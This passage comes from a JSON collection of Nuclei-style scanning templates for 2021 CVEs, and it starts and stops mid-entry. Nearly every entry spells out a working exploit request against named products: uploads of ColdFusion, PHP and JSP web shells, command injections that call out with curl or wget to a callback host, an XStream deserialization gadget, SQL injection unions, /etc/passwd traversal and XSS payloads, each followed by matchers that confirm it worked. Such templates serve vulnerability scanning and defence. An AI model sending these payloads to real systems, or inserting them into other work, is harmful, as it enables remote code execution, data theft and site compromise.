Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-25094","info":{"name":"Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38\n\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"action\"\n\nadd_custom_font\n--a8bfdd88f26f754c25496d0dd4962d38\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.zip\"\n\n{{zip('.{{filename}}.php','<?php echo base64_decode(\\'{{b64marker}}\\'); ?>')}}\n--a8bfdd88f26f754c25496d0dd4962d38--\n"],"matchers":[{"type":"word","part":"body","words":["\"name\":\"{{to_lower(filename)}}\"","\"status\":\"success"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/uploads/typehub/custom/{{to_lower(filename)}}/.{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{marker}}"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24915","info":{"name":"Contest Gallery < 13.1.0.6 - SQL injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WpUserId","Username","Usermail"],"condition":"and"},{"type":"word","part":"header","words":["text/csv","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26812","info":{"name":"Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain);"]},{"type":"word","part":"header","words":["MoodleSession"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Pie Register","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24627","info":{"name":"G Auto-Hyperlink <= 1.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+I\n","GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["c8c605999f3d8352d7bb792cf3fdb25b","Keyword","g-auto-hyperlink-edit"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-29006","info":{"name":"rConfig 3.9.6 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /dashboard.php HTTP/1.1\nHost: {{Hostname}}\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_2","words":["rconfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; 